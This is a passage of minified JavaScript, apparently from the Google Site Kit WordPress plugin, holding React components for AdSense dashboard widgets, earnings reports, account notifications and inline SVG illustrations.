T?(0,G.jsxs)(e,{Header:be,Footer:Ce,noPadding:!0,children:[(0,G.jsx)(je.A,{width:"100%",height:"190px",padding:!0}),(0,G.jsx)(je.A,{width:"100%",height:"270px",padding:!0})]}):S.length?(0,G.jsx)(e,{Header:be,Footer:Ce,children:(0,G.jsx)(t,{moduleSlug:"adsense",error:S})}):(0,G.jsxs)(e,{Header:be,Footer:Ce,noPadding:!0,children:[!i&&l&&(0,G.jsx)(StatusMigration,{}),(0,G.jsx)(Ze,{metrics:ModuleOverviewWidget.metrics,currentRangeData:A,previousRangeData:M,selectedStats:s,handleStatsSelection:o}),(0,G.jsx)(Stats,{metrics:ModuleOverviewWidget.metrics,currentRangeData:N,previousRangeData:f,selectedStats:s})]})}ModuleOverviewWidget.propTypes={Widget:ee().elementType.isRequired,WidgetReportZero:ee().elementType.isRequired,WidgetReportError:ee().elementType.isRequired},ModuleOverviewWidget.metrics={ESTIMATED_EARNINGS:(0,g.__)("Earnings","google-site-kit"),PAGE_VIEWS_RPM:(0,g.__)("Page RPM","google-site-kit"),IMPRESSIONS:(0,g.__)("Impressions","google-site-kit"),PAGE_VIEWS_CTR:(0,g.__)("Page CTR","google-site-kit")};const ze=(0,ie.A)({moduleName:F.Py})(ModuleOverviewWidget);var Oe=i(93431),Pe=i(15345),Be=i(96820);const Ue={moduleSlug:F.Py};function ConnectAdSenseCTATileWidget({Widget:e,widgetSlug:t}){return(0,Be.A)(t,Pe.A,Ue),(0,G.jsx)(e,{children:(0,G.jsx)(Pe.A,{...Ue})})}ConnectAdSenseCTATileWidget.propTypes={Widget:ee().elementType.isRequired,widgetSlug:ee().string.isRequired};var We=i(33610),He=i(89998);function TopEarningContentWidget({Widget:e}){const t=(0,ne.A)(),i=(0,a.useSelect)(e=>e(ae.oR).getDateRangeDates({offsetDays:k.f2})),s=(0,a.useSelect)(e=>e(k.wl).getAccountID()),o={...i,dimensions:["pagePath","adSourceName"],metrics:[{name:"totalAdRevenue"}],dimensionFilters:{adSourceName:`Google AdSense account (${s})`},orderby:[{metric:{metricName:"totalAdRevenue"},desc:!0}],limit:3,reportID:"adsense_top-earning-content-widget_widget_reportOptions"},n=(0,a.useInViewSelect)(e=>e(he.K9).getReport(o),[o]),r=(0,a.useSelect)(e=>e(he.K9).getErrorForSelector("getReport",[o])),l=(0,a.useInViewSelect)(e=>r?void 0:e(he.K9).getPageTitles(n,o),[n,o]),c=(0,a.useSelect)(e=>!e(he.K9).hasFinishedResolution("getReport",[o])||void 0===l);if(!(0,a.useSelect)(e=>{if(!t||!c)return e(he.K9).getAdSenseLinked()})&&!t)return(0,G.jsx)(e,{children:(0,G.jsx)(H.gx,{})});const{rows:d=[]}=n||{},g=[{field:"dimensionValues.0.value",Component({fieldValue:e}){const s=e,o=l[s],n=(0,a.useSelect)(e=>t?null:e(he.K9).getServiceReportURL("all-pages-and-screens",{filters:{unifiedPagePathScreen:s},dates:i}));return t?(0,G.jsx)(We.mF,{content:o}):(0,G.jsx)(P.A,{href:n,title:o,external:!0,hideExternalIndicator:!0,children:o})}},{field:"metricValues.0.value",Component:({fieldValue:e})=>(0,G.jsx)("strong",{children:(0,S.Eo)(e,{style:"currency",currency:n?.metadata?.currencyCode})})}];return(0,G.jsx)(We.$,{Widget:e,widgetSlug:ae.p3,loading:c,rows:d,columns:g,ZeroState:Se.QQ,error:r,moduleSlug:"analytics-4"})}TopEarningContentWidget.propTypes={Widget:ee().elementType.isRequired};const Ve=(0,Ie.A)((0,ie.A)({moduleName:ye.L1,FallbackComponent:He.A}),(0,ie.A)({moduleName:F.Py,FallbackComponent:ConnectAdSenseCTATileWidget}))(TopEarningContentWidget);var Ye,Fe,Qe,Je,Xe=i(84730),qe=i(20697),Ke=i(8732),$e=i(89766);function et(){return et=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},et.apply(null,arguments)}const tt=e=>I.createElement("svg",et({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 52 52"},e),Ye||(Ye=I.createElement("circle",{cx:26,cy:26,r:26,fill:"#fff"})),Fe||(Fe=I.createElement("path",{fill:"#547EC0",d:"M30.514 38.167a4.63 4.63 0 0 0 3.991-2.27l4.85-8.013a4.62 4.62 0 0 0-1.629-6.332 4.636 4.636 0 0 0-6.344 1.625l-4.85 8.013a4.62 4.62 0 0 0 1.63 6.331c.739.437 1.55.646 2.352.646"})),Qe||(Qe=I.createElement("path",{fill:"#F9B918",d:"M15.909 38.171a4.6 4.6 0 0 1-2.353-.644 4.62 4.62 0 0 1-1.629-6.332l9.259-15.925a4.64 4.64 0 0 1 6.344-1.626 4.617 4.617 0 0 1 1.628 6.332L19.9 35.9a4.63 4.63 0 0 1-3.991 2.271"})),Je||(Je=I.createElement("path",{fill:"#31A751",d:"M15.887 38.171a4.6 4.6 0 0 0 4.604-4.596 4.6 4.6 0 0 0-4.604-4.595 4.6 4.6 0 0 0-4.605 4.595 4.6 4.6 0 0 0 4.605 4.596"})));function DashboardMainEffectComponent(){return function(){const e=(0,T.A)(),t=(0,a.useSelect)(e=>e(Y.i).isModuleConnected(F.Py)),i=(0,a.useSelect)(e=>e(k.wl).getAccountID()),[s,o]=(0,I.useState)([]),{registerNotification:n}=(0,a.useDispatch)(Ke.D),r=(0,a.useSelect)(e=>e(k.wl).getNotifications());(0,I.useEffect)(()=>{t&&i&&r?.forEach(t=>{if(s.includes(t.id))return;const i={...t};i.title||(i.title=(0,g.__)("Notice about your AdSense account","google-site-kit")),!i.content?.length&&i.description?.length&&(i.content=i.description,delete i.description),void 0===i.dismissible&&void 0!==i.isDismissible&&(i.dismissible=i.isDismissible,delete i.isDismissible);const a={category:`${e}_adsense-alerts-banner-notification`,label:t.id};n(t.id,{Component:({Notification:e})=>(0,G.jsx)(e,{gaTrackingEventArgs:a,children:(0,G.jsx)($e.A,{...i,titleIcon:(0,G.jsx)(tt,{}),gaTrackingEventArgs:a})}),priority:t.priority,areaSlug:Xe.bI.HEADER,isDismissible:!0}),o(e=>[...e,t.id])})},[e,i,t,r,n,s])}(),null}var it,at;function st(){return st=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},st.apply(null,arguments)}const ot=e=>I.createElement("svg",st({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 296 163"},e),it||(it=I.createElement("g",{clipPath:"url(#analytics-adsense-linked-desktop_svg__a)"},I.createElement("path",{fill:"#B8E6CA",d:"M0 16C0 7.163 7.163 0 16 0h264c8.837 0 16 7.163 16 16v147H0z"}),I.createElement("g",{filter:"url(#analytics-adsense-linked-desktop_svg__b)"},I.createElement("rect",{width:248,height:174,x:24,y:23,fill:"#fff",rx:11}),I.createElement("rect",{width:116,height:14,x:48,y:96,fill:"#9CEBEB",rx:7}),I.createElement("rect",{width:141,height:14,x:48,y:124,fill:"#9CEBEB",rx:7}),I.createElement("rect",{width:97,height:14,x:48,y:153,fill:"#9CEBEB",rx:7}),I.createElement("path",{fill:"#EBEEF0",d:"M222 103a7 7 0 0 1 7-7h12a7 7 0 1 1 0 14h-12a7 7 0 0 1-7-7M222 131a7 7 0 0 1 7-7h12a7 7 0 1 1 0 14h-12a7 7 0 0 1-7-7M222 159a7 7 0 0 1 7-7h12a7 7 0 1 1 0 14h-12a7 7 0 0 1-7-7"}),I.createElement("rect",{width:36,height:9,x:48,y:44,fill:"#EBEEF0",rx:4.5}),I.createElement("rect",{width:55.734,height:9.516,x:46.672,y:162.656,fill:"#EBEEF0",rx:4.758}),I.createElement("path",{stroke:"#EBEEF0",strokeWidth:2,d:"M272 72H24"})))),at||(at=I.createElement("defs",null,I.createElement("clipPath",{id:"analytics-adsense-linked-desktop_svg__a"},I.createElement("path",{fill:"#fff",d:"M0 16C0 7.163 7.163 0 16 0h264c8.837 0 16 7.163 16 16v147H0z"})),I.createElement("filter",{id:"analytics-adsense-linked-desktop_svg__b",width:280,height:206,x:8,y:11,colorInterpolationFilters:"sRGB",filterUnits:"userSpaceOnUse"},I.createElement("feFlood",{floodOpacity:0,result:"BackgroundImageFix"}),I.createElement("feColorMatrix",{in:"SourceAlpha",result:"hardAlpha",values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"}),I.createElement("feOffset",{dy:4}),I.createElement("feGaussianBlur",{stdDeviation:8}),I.createElement("feComposite",{in2:"hardAlpha",operator:"out"}),I.createElement("feColorMatrix",{values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"}),I.createElement("feBlend",{in2:"BackgroundImageFix",result:"effect1_dropShadow_100_3563"}),I.createElement("feBlend",{in:"SourceGraphic",in2:"effect1_dropShadow_100_3563",result:"shape"})))));var nt,rt;function lt(){return lt=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},lt.apply(null,arguments)}const ct=e=>I.createElement("svg",lt({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 343 123"},e),nt||(nt=I.createElement("g",{clipPath:"url(#analytics-adsense-linked-mobile_svg__a)"},I.createElement("path",{fill:"#B8E6CA",d:"M311.553 64.365c2.4 22.73-4.803 32.78-23.025 59.95-18.222 27.169 7.404 59.276-20.779 89.868-33.528 36.394-150.686 39.364-201.232 24.212-50.546-15.153-63.58-46.473-59.948-75.155C11.5 124.315 38.52 112.077 51.5 93 70.776 64.675 48.687 38.214 86 15.5s80.086 6.697 120.326 4.388c23.216-1.332 46.017-5.627 66.626.968 20.832 6.667 36.719 25.428 38.601 43.509"}),I.createElement("g",{filter:"url(#analytics-adsense-linked-mobile_svg__b)"},I.createElement("rect",{width:193.381,height:135.679,x:74.81,y:12.732,fill:"#fff",rx:8.577}),I.createElement("rect",{width:90.452,height:10.917,x:93.524,y:69.655,fill:"#9CEBEB",rx:5.458}),I.createElement("rect",{width:109.946,height:10.917,x:93.524,y:91.488,fill:"#9CEBEB",rx:5.458}),I.createElement("rect",{width:75.637,height:10.917,x:93.524,y:114.101,fill:"#9CEBEB",rx:5.458}),I.createElement("path",{fill:"#EBEEF0",d:"M229.202 75.113a5.46 5.46 0 0 1 5.458-5.458h9.358a5.458 5.458 0 0 1 0 10.916h-9.358a5.46 5.46 0 0 1-5.458-5.458M229.202 96.946a5.46 5.46 0 0 1 5.458-5.458h9.358a5.458 5.458 0 0 1 0 10.917h-9.358a5.46 5.46 0 0 1-5.458-5.459M229.202 118.78a5.46 5.46 0 0 1 5.458-5.459h9.358a5.459 5.459 0 0 1 0 10.917h-9.358a5.46 5.46 0 0 1-5.458-5.458"}),I.createElement("rect",{width:28.071,height:7.018,x:93.524,y:29.107,fill:"#EBEEF0",rx:3.509}),I.createElement("rect",{width:43.459,height:7.42,x:92.488,y:121.631,fill:"#EBEEF0",rx:3.71}),I.createElement("path",{stroke:"#EBEEF0",strokeWidth:1.56,d:"M268.19 50.94H74.81"})))),rt||(rt=I.createElement("defs",null,I.createElement("clipPath",{id:"analytics-adsense-linked-mobile_svg__a"},I.createElement("path",{fill:"#fff",d:"M0 0h343v123H0z"})),I.createElement("filter",{id:"analytics-adsense-linked-mobile_svg__b",width:218.333,height:160.631,x:62.333,y:3.375,colorInterpolationFilters:"sRGB",filterUnits:"userSpaceOnUse"},I.createElement("feFlood",{floodOpacity:0,result:"BackgroundImageFix"}),I.createElement("feColorMatrix",{in:"SourceAlpha",result:"hardAlpha",values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"}),I.createElement("feOffset",{dy:3.119}),I.createElement("feGaussianBlur",{stdDeviation:6.238}),I.createElement("feComposite",{in2:"hardAlpha",operator:"out"}),I.createElement("feColorMatrix",{values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"}),I.createElement("feBlend",{in2:"BackgroundImageFix",result:"effect1_dropShadow_413_2990"}),I.createElement("feBlend",{in:"SourceGraphic",in2:"effect1_dropShadow_413_2990",result:"shape"})))));var dt=i(97513),gt=i(11883),ut=i(33903);const mt="AnalyticsAndAdSenseLinkedOverlayNotification";function AnalyticsAndAdSenseAccountsDetectedAsLinkedOverlayNotification({id:e,Notification:t}){const s=(0,dt.dv)(),o=(0,T.A)(),{dismissNotification:n}=(0,a.useDispatch)(Ke.D);const r={category:`${o}_top-earning-pages-widget`,viewAction:"view_overlay_CTA",dismissAction:"dismiss_overlay_CTA",confirmAction:"confirm_overlay_CTA"};return(0,G.jsx)(t,{gaTrackingEventArgs:r,children:(0,G.jsx)(ut.A,{notificationID:e,title:(0,g.__)("See your top earning content","google-site-kit"),description:(0,g.__)("Data is now available for the pages that earn the most AdSense revenue.","google-site-kit"),GraphicDesktop:ot,GraphicMobile:ct,ctaButton:{label:(0,g.__)("Show me","google-site-kit"),onClick:function(t){t.preventDefault(),n(e),setTimeout(()=>{i.g.history.replaceState({},"",`#${qe.Gw}`),i.g.scrollTo({top:(0,gt.YJ)(".googlesitekit-widget--adsenseTopEarningPagesGA4",s),behavior:"smooth"})},50)}},gaTrackingEventArgs:r,dismissButton:!0})})}var pt,It;function ht(){return ht=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},ht.apply(null,arguments)}AnalyticsAndAdSenseAccountsDetectedAsLinkedOverlayNotification.propTypes={id:ee().string.isRequired,Notification:ee().elementType.isRequired};const yt=e=>I.createElement("svg",ht({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 296 163"},e),pt||(pt=I.createElement("g",{clipPath:"url(#analytics-adsense-connect-desktop_svg__a)"},I.createElement("path",{fill:"#B8E6CA",d:"M0 16C0 7.163 7.163 0 16 0h264c8.837 0 16 7.163 16 16v147H0z"}),I.createElement("g",{filter:"url(#analytics-adsense-connect-desktop_svg__b)"},I.createElement("rect",{width:252,height:172.055,x:22,y:30,fill:"#fff",rx:13.764}),I.createElement("rect",{width:224,height:47,x:36,y:65,fill:"#DCE8FF",rx:5.161}),I.createElement("rect",{width:30,height:3,x:43,y:145,fill:"#9BB8F0",rx:1.5}),I.createElement("rect",{width:40,height:3,x:43,y:151,fill:"#9BB8F0",rx:1.5}),I.createElement("path",{fill:"#9BB8F0",d:"M168.539 90.857 188 112h-81l29.455-32 21.039 22.857z"}),I.createElement("path",{fill:"#EBEEF0",d:"M22 43.764C22 36.162 28.162 30 35.764 30h224.472C267.838 30 274 36.162 274 43.764v7.091H22z"}),I.createElement("rect",{width:6.952,height:6.952,x:32.427,y:36.952,fill:"#CBD0D3",rx:3.476}),I.createElement("rect",{width:6.952,height:6.952,x:42.855,y:36.952,fill:"#CBD0D3",rx:3.476}),I.createElement("rect",{width:59,height:55,x:36,y:122,fill:"#EBEEF0",rx:5.457}),I.createElement("rect",{width:54,height:10,x:107,y:122,fill:"#EBEEF0",rx:5}),I.createElement("rect",{width:153,height:5,x:107,y:141,fill:"#EBEEF0",rx:2.5}),I.createElement("rect",{width:153,height:5,x:107,y:154,fill:"#EBEEF0",rx:2.5}),I.createElement("path",{fill:"#E1B155",d:"M238.51 171.625c11.868 0 21.49-3.528 21.49-7.88v-2.865h-42.98v2.865c0 4.352 9.621 7.88 21.49 7.88"}),I.createElement("ellipse",{cx:238.51,cy:159.88,fill:"#FECE72",rx:21.49,ry:7.88}),I.createElement("path",{fill:"#AA7A1E",d:"M237.859 162.363v-.48a4.5 4.5 0 0 1-.901-.154 2.9 2.9 0 0 1-.77-.342 1.4 1.4 0 0 1-.496-.534l.952-.209q.122.242.446.435.334.192.769.248v-1.223l-.03-.011q-.81-.166-1.337-.43-.526-.27-.526-.689 0-.248.222-.468.233-.221.659-.364a3.6 3.6 0 0 1 1.012-.176v-.474h.81v.485q.527.044.882.17.364.122.567.281.212.16.293.304l-.931.22a.9.9 0 0 0-.284-.243 1.5 1.5 0 0 0-.527-.181v1.157q.547.121.973.27.425.143.668.347a.6.6 0 0 1 .253.496.69.69 0 0 1-.273.551q-.264.226-.699.358a4.2 4.2 0 0 1-.922.171v.485zm-.85-3.389q0 .177.212.298.224.115.638.225v-.991a1.8 1.8 0 0 0-.617.17q-.234.127-.233.298m2.501 1.829q0-.187-.223-.303a2.8 2.8 0 0 0-.618-.22v1.041q.366-.05.598-.181.243-.133.243-.337"}),I.createElement("path",{fill:"#E1B155",d:"M238.51 165.625c11.868 0 21.49-3.528 21.49-7.88v-2.865h-42.98v2.865c0 4.352 9.621 7.88 21.49 7.88"}),I.createElement("ellipse",{cx:238.51,cy:153.88,fill:"#FECE72",rx:21.49,ry:7.88}),I.createElement("path",{fill:"#AA7A1E",d:"M237.859 156.363v-.48a4.5 4.5 0 0 1-.901-.154 2.9 2.9 0 0 1-.77-.342 1.4 1.4 0 0 1-.496-.534l.952-.209q.122.242.446.435.334.192.769.248v-1.223l-.03-.011q-.81-.166-1.337-.43-.526-.27-.526-.689 0-.248.222-.468.233-.221.659-.364a3.6 3.6 0 0 1 1.012-.176v-.474h.81v.485q.527.044.882.17.364.122.567.281.212.16.293.304l-.931.22a.9.9 0 0 0-.284-.243 1.5 1.5 0 0 0-.527-.181v1.157q.547.121.973.27.425.143.668.347a.6.6 0 0 1 .253.496.69.69 0 0 1-.273.551q-.264.226-.699.358a4.2 4.2 0 0 1-.922.171v.485zm-.85-3.389q0 .177.212.298.224.115.638.225v-.991a1.8 1.8 0 0 0-.617.17q-.234.127-.233.298m2.501 1.829q0-.187-.223-.303a2.8 2.8 0 0 0-.618-.22v1.041q.366-.05.598-.181.243-.133.243-.337"}),I.createElement("path",{fill:"#E1B155",d:"M238.51 159.625c11.868 0 21.49-3.528 21.49-7.88v-2.865h-42.98v2.865c0 4.352 9.621 7.88 21.49 7.88"}),I.createElement("ellipse",{cx:238.51,cy:147.88,fill:"#FECE72",rx:21.49,ry:7.88}),I.createElement("path",{fill:"#AA7A1E",d:"M237.859 150.363v-.48a4.5 4.5 0 0 1-.901-.154 2.9 2.9 0 0 1-.77-.342 1.4 1.4 0 0 1-.496-.534l.952-.209q.122.242.446.435.334.192.769.248v-1.223l-.03-.011q-.81-.166-1.337-.43-.526-.27-.526-.689 0-.248.222-.468.233-.221.659-.364a3.6 3.6 0 0 1 1.012-.176v-.474h.81v.485q.527.044.882.17.364.122.567.281.212.16.293.304l-.931.22a.9.9 0 0 0-.284-.243 1.5 1.5 0 0 0-.527-.181v1.157q.547.121.973.27.425.143.668.347a.6.6 0 0 1 .253.496.69.69 0 0 1-.273.551q-.264.226-.699.358a4.2 4.2 0 0 1-.922.171v.485zm-.85-3.389q0 .177.212.298.224.115.638.225v-.991a1.8 1.8 0 0 0-.617.17q-.234.127-.233.298m2.501 1.829q0-.187-.223-.303a2.8 2.8 0 0 0-.618-.22v1.041q.366-.05.598-.181.243-.133.243-.337"}),I.createElement("path",{fill:"#E1B155",d:"M238.51 153.625c11.868 0 21.49-3.528 21.49-7.88v-2.865h-42.98v2.865c0 4.352 9.621 7.88 21.49 7.88"}),I.createElement("ellipse",{cx:238.51,cy:141.88,fill:"#FECE72",rx:21.49,ry:7.88}),I.createElement("path",{fill:"#AA7A1E",d:"M237.859 144.363v-.48a4.5 4.5 0 0 1-.901-.154 2.9 2.9 0 0 1-.77-.342 1.4 1.4 0 0 1-.496-.534l.952-.209q.122.242.446.435.334.192.769.248v-1.223l-.03-.011q-.81-.166-1.337-.43-.526-.27-.526-.689 0-.248.222-.468.233-.221.659-.364a3.6 3.6 0 0 1 1.012-.176v-.474h.81v.485q.527.044.882.17.364.122.567.281.212.16.293.304l-.931.22a.9.9 0 0 0-.284-.243 1.5 1.5 0 0 0-.527-.181v1.157q.547.121.973.27.425.143.668.347a.6.6 0 0 1 .253.496.69.69 0 0 1-.273.551q-.264.226-.699.358a4.2 4.2 0 0 1-.922.171v.485zm-.85-3.389q0 .177.212.298.224.115.638.225v-.991a1.8 1.8 0 0 0-.617.17q-.234.127-.233.298m2.501 1.829q0-.187-.223-.303a2.8 2.8 0 0 0-.618-.22v1.041q.366-.05.598-.181.243-.133.243-.337"}),I.createElement("path",{fill:"#E1B155",d:"M238.51 147.625c11.868 0 21.49-3.528 21.49-7.88v-2.865h-42.98v2.865c0 4.352 9.621 7.88 21.49 7.88"}),I.createElement("ellipse",{cx:238.51,cy:135.88,fill:"#FECE72",rx:21.49,ry:7.88}),I.createElement("path",{fill:"#AA7A1E",d:"M237.859 138.363v-.48a4.5 4.5 0 0 1-.901-.154 2.9 2.9 0 0 1-.77-.342 1.4 1.4 0 0 1-.496-.534l.952-.209q.122.242.446.435.334.192.769.248v-1.223l-.03-.011q-.81-.166-1.337-.43-.526-.27-.526-.689 0-.248.222-.468.233-.221.659-.364a3.6 3.6 0 0 1 1.012-.176v-.474h.81v.485q.527.044.882.17.364.122.567.281.212.16.293.304l-.931.22a.9.9 0 0 0-.284-.243 1.5 1.5 0 0 0-.527-.181v1.157q.547.121.973.27.425.143.668.347a.6.6 0 0 1 .253.496.69.69 0 0 1-.273.551q-.264.226-.699.358a4.2 4.2 0 0 1-.922.171v.485zm-.85-3.389q0 .177.212.298.224.115.638.225v-.991a1.8 1.8 0 0 0-.617.17q-.234.127-.233.298m2.501 1.829q0-.187-.223-.303a2.8 2.8 0 0 0-.618-.22v1.041q.366-.05.598-.181.243-.133.243-.337"}),I.createElement("path",{fill:"#E1B155",d:"M238.51 141.625c11.868 0 21.49-3.528 21.49-7.88v-2.865h-42.98v2.865c0 4.352 9.621 7.88 21.49 7.88"}),I.createElement("ellipse",{cx:238.51,cy:129.88,fill:"#FECE72",rx:21.49,ry:7.88}),I.createElement("path",{fill:"#AA7A1E",d:"M237.859 132.363v-.48a4.5 4.5 0 0 1-.901-.154 2.9 2.9 0 0 1-.77-.342 1.4 1.4 0 0 1-.496-.534l.952-.209q.122.242.446.435.334.192.769.248v-1.223l-.03-.011q-.81-.166-1.337-.43-.526-.27-.526-.689 0-.248.222-.468.233-.221.659-.364a3.6 3.6 0 0 1 1.012-.176v-.474h.81v.485q.527.044.882.17.364.122.567.281.212.16.293.304l-.931.22a.9.9 0 0 0-.284-.243 1.5 1.5 0 0 0-.527-.181v1.157q.547.121.973.27.425.143.668.347a.6.6 0 0 1 .253.496.69.69 0 0 1-.273.551q-.264.226-.699.358a4.2 4.2 0 0 1-.922.171v.485zm-.85-3.389q0 .177.212.298.224.115.638.225v-.991a1.8 1.8 0 0 0-.617.17q-.234.127-.233.298m2.501 1.829q0-.187-.223-.303a2.8 2.8 0 0 0-.618-.22v1.041q.366-.05.598-.181.243-.133.243-.337"}),I.createElement("path",{stroke:"#E1B155",strokeWidth:1.624,d:"M238.51 124.244c5.077 0 9.639.714 12.904 1.844 1.635.566 2.902 1.222 3.743 1.91.847.693 1.166 1.334 1.166 1.882s-.32 1.188-1.166 1.881c-.841.688-2.107 1.343-3.743 1.91-3.265 1.13-7.827 1.844-12.904 1.844s-9.64-.714-12.904-1.844c-1.636-.567-2.902-1.222-3.743-1.91-.847-.693-1.166-1.333-1.166-1.881s.319-1.189 1.166-1.882c.841-.688 2.107-1.344 3.743-1.91 3.264-1.13 7.827-1.844 12.904-1.844Z"}),I.createElement("ellipse",{cx:209.51,cy:166.88,fill:"#FECE72",rx:21.49,ry:7.88}),I.createElement("path",{fill:"#E1B155",d:"M209.51 172.625c11.868 0 21.49-3.528 21.49-7.88v-2.865h-42.98v2.865c0 4.352 9.621 7.88 21.49 7.88"}),I.createElement("ellipse",{cx:209.51,cy:160.88,fill:"#FECE72",rx:21.49,ry:7.88}),I.createElement("path",{fill:"#AA7A1E",d:"M208.859 163.363v-.48a4.5 4.5 0 0 1-.901-.154 2.9 2.9 0 0 1-.77-.342 1.4 1.4 0 0 1-.496-.534l.952-.209q.122.242.446.435.334.192.769.248v-1.223l-.03-.011q-.81-.166-1.337-.43-.526-.27-.526-.689 0-.248.222-.468.233-.221.659-.364a3.6 3.6 0 0 1 1.012-.176v-.474h.81v.485q.527.044.882.17.364.122.567.281.212.16.293.304l-.931.22a.9.9 0 0 0-.284-.243 1.5 1.5 0 0 0-.527-.181v1.157q.547.121.973.27.425.143.668.347a.6.6 0 0 1 .253.496.69.69 0 0 1-.273.551q-.264.226-.699.358a4.2 4.2 0 0 1-.922.171v.485zm-.85-3.389q0 .177.212.298.224.115.638.225v-.991a1.8 1.8 0 0 0-.617.17q-.234.127-.233.298m2.501 1.829q0-.187-.223-.303a2.8 2.8 0 0 0-.618-.22v1.041q.366-.05.598-.181.243-.133.243-.337"}),I.createElement("path",{fill:"#E1B155",d:"M209.51 166.625c11.868 0 21.49-3.528 21.49-7.88v-2.865h-42.98v2.865c0 4.352 9.621 7.88 21.49 7.88"}),I.createElement("ellipse",{cx:209.51,cy:154.88,fill:"#FECE72",rx:21.49,ry:7.88}),I.createElement("path",{fill:"#AA7A1E",d:"M208.859 157.363v-.48a4.5 4.5 0 0 1-.901-.154 2.9 2.9 0 0 1-.77-.342 1.4 1.4 0 0 1-.496-.534l.952-.209q.122.242.446.435.334.192.769.248v-1.223l-.03-.011q-.81-.166-1.337-.43-.526-.27-.526-.689 0-.248.222-.468.233-.221.659-.364a3.6 3.6 0 0 1 1.012-.176v-.474h.81v.485q.527.044.882.17.364.122.567.281.212.16.293.304l-.931.22a.9.9 0 0 0-.284-.243 1.5 1.5 0 0 0-.527-.181v1.157q.547.121.973.27.425.143.668.347a.6.6 0 0 1 .253.496.69.69 0 0 1-.273.551q-.264.226-.699.358a4.2 4.2 0 0 1-.922.171v.485zm-.85-3.389q0 .177.212.298.224.115.638.225v-.991a1.8 1.8 0 0 0-.617.17q-.234.127-.233.298m2.501 1.829q0-.187-.223-.303a2.8 2.8 0 0 0-.618-.22v1.041q.366-.05.598-.181.243-.133.243-.337"}),I.createElement("path",{fill:"#E1B155",d:"M209.51 160.625c11.868 0 21.49-3.528 21.49-7.88v-2.865h-42.98v2.865c0 4.352 9.621 7.88 21.49 7.88"}),I.createElement("ellipse",{cx:209.51,cy:148.88,fill:"#FECE72",rx:21.49,ry:7.88}),I.createElement("path",{fill:"#AA7A1E",d:"M208.859 151.363v-.48a4.5 4.5 0 0 1-.901-.154 2.9 2.9 0 0 1-.77-.342 1.4 1.4 0 0 1-.496-.534l.952-.209q.122.242.446.435.334.192.769.248v-1.223l-.03-.011q-.81-.166-1.337-.43-.526-.27-.526-.689 0-.248.222-.468.233-.221.659-.364a3.6 3.6 0 0 1 1.012-.176v-.474h.81v.485q.527.044.882.17.364.122.567.281.212.16.293.304l-.931.22a.9.9 0 0 0-.284-.243 1.5 1.5 0 0 0-.527-.181v1.157q.547.121.973.27.425.143.668.347a.6.6 0 0 1 .253.496.69.69 0 0 1-.273.551q-.264.226-.699.358a4.2 4.2 0 0 1-.922.171v.485zm-.85-3.389q0 .177.212.298.224.115.638.225v-.991a1.8 1.8 0 0 0-.617.17q-.234.127-.233.298m2.501 1.829q0-.187-.223-.303a2.8 2.8 0 0 0-.618-.22v1.041q.366-.05.598-.181.243-.133.243-.337"}),I.createElement("path",{stroke:"#E1B155",strokeWidth:1.624,d:"M209.51 143.244c5.077 0 9.639.714 12.904 1.844 1.635.566 2.902 1.222 3.743 1.91.847.693 1.166 1.334 1.166 1.882s-.32 1.188-1.166 1.881c-.841.688-2.107 1.343-3.743 1.91-3.265 1.13-7.827 1.844-12.904 1.844s-9.64-.714-12.904-1.844c-1.636-.567-2.902-1.222-3.743-1.91-.847-.693-1.166-1.333-1.166-1.881s.319-1.189 1.166-1.882c.841-.688 2.107-1.344 3.743-1.91 3.264-1.13 7.827-1.844 12.904-1.844Z"})))),It||(It=I.createElement("defs",null,I.createElement("clipPath",{id:"analytics-adsense-connect-desktop_svg__a"},I.createElement("path",{fill:"#fff",d:"M0 16C0 7.163 7.163 0 16 0h264c8.837 0 16 7.163 16 16v147H0z"})),I.createElement("filter",{id:"analytics-adsense-connect-desktop_svg__b",width:284,height:204.055,x:6,y:18,colorInterpolationFilters:"sRGB",filterUnits:"userSpaceOnUse"},I.createElement("feFlood",{floodOpacity:0,result:"BackgroundImageFix"}),I.createElement("feColorMatrix",{in:"SourceAlpha",result:"hardAlpha",values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"}),I.createElement("feOffset",{dy:4}),I.createElement("feGaussianBlur",{stdDeviation:8}),I.createElement("feComposite",{in2:"hardAlpha",operator:"out"}),I.createElement("feColorMatrix",{values:"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"}),I.createElement("feBlend",{in2:"BackgroundImageFix",result:"effect1_dropShadow_50_9707"}),I.createElement("feBlend",{in:"SourceGraphic",in2:"effect1_dropShadow_50_9707",result:"shape"})))));var At,Mt;function Nt(){return Nt=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},Nt.apply(null,arguments)}const ft=e=>I.createElement("svg",Nt({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 343 123"},e),At||(At=I.createElement("g",{clipPath:"url(#analytics-adsense-connect-mobile_svg__a)"},I.createElement("path",{fill:"#B8E6CA",d:"M311.553 64.365c2.4 22.73-4.803 32.78-23.025 59.95-18.222 27.169 7.404 59.276-20.779 89.868-33.528 36.394-150.686 39.364-201.232 24.212-50.546-15.153-63.58-46.473-59.948-75.155C11.5 124.315 38.52 112.077 51.5 93 70.776 64.675 48.687 38.214 86 